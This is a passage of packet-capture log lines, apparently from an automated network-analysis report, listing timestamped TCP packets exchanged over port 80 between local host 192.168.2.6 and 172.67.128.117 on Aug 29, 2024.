                                    Aug 29, 2024 12:02:36.105568886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105580091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105592012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105650902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105650902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105710030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105721951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105732918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105746031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105757952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105766058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105766058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105772018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105798006 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105811119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105820894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105833054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105844021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105855942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105866909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105866909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105895042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105935097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105947971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105962038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105974913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105978966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105992079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106015921 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106046915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106057882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106070042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106097937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106159925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106180906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106194019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106204987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106220007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106232882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106232882 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106246948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106260061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106270075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106270075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106302977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106314898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106317997 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106338024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106347084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106349945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106384993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106384993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106488943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106502056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106513977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106528044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106528044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106544018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106554031 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106570959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106601000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106618881 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106630087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106641054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106653929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106671095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106671095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106708050 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106710911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106723070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106734037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106748104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106760025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106760025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106761932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106774092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106801033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106818914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106975079 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106987953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107011080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107023001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107029915 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107038975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107043982 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107079983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107084036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107091904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107104063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107115984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107131958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107157946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107157946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107300997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107314110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107326031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107338905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107350111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107361078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107361078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107363939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107377052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107388973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107391119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107407093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107409000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107419968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107425928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107459068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107481003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107521057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107530117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107534885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107556105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107594967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107605934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107616901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107630968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107651949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107651949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107686043 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107726097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107736111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107747078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107759953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107769966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107769966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107774019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107784986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107798100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107800007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107836008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107845068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107916117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107927084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107939005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107960939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107960939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.107985973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.107997894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108016014 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108016014 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108055115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108069897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108081102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108087063 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108087063 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108093977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108107090 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108124971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108134985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108200073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108211994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108225107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108237028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108239889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108253956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108264923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108277082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.108285904 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108285904 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.108314037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.144130945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144184113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144198895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144211054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144224882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144237041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144251108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144263029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.144340038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.144340038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.361942053 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.361977100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.361989975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362003088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362040043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362054110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362067938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362071037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362082958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362102032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362132072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362143040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362168074 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362265110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362276077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362287998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362302065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362310886 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362314939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362327099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362341881 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362354994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362359047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362359047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362370968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362380028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362409115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362509966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362520933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362531900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362549067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362550974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362565041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362600088 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362600088 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362659931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362672091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362688065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362694025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362700939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362726927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362749100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362761974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362772942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362777948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362787008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362787962 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362802982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362811089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362816095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362829924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362844944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362848043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.362874031 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.362880945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363122940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363135099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363147020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363158941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363176107 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363179922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363197088 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363199949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363215923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363221884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363226891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363243103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363250971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363255024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363270998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363271952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363281965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363290071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363300085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363302946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363317966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363336086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363339901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363339901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363373995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363382101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363670111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363682032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363692999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363704920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363718033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363718987 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363729000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363733053 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363744974 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363749027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363761902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363776922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363789082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363796949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363796949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363809109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363822937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363828897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363845110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363856077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363863945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363871098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363871098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363878012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363892078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363903046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363914013 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363914013 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363917112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363930941 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363934040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363946915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363960028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363969088 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.363971949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363990068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.363991976 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364002943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364017010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364025116 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364025116 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364037991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364053965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364059925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364069939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364082098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364095926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364095926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364095926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364118099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364140987 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364454031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364515066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364661932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364675045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364686966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364703894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364706993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364723921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364746094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364748001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364761114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364770889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364772081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364773035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364782095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364794016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364808083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364809990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364824057 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364839077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364845991 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364852905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364864111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364871025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364871025 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364878893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364888906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364901066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364902973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364916086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364923000 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364932060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364944935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364953041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.364959002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364965916 CEST4971780192.168.2.6172.67.128.117
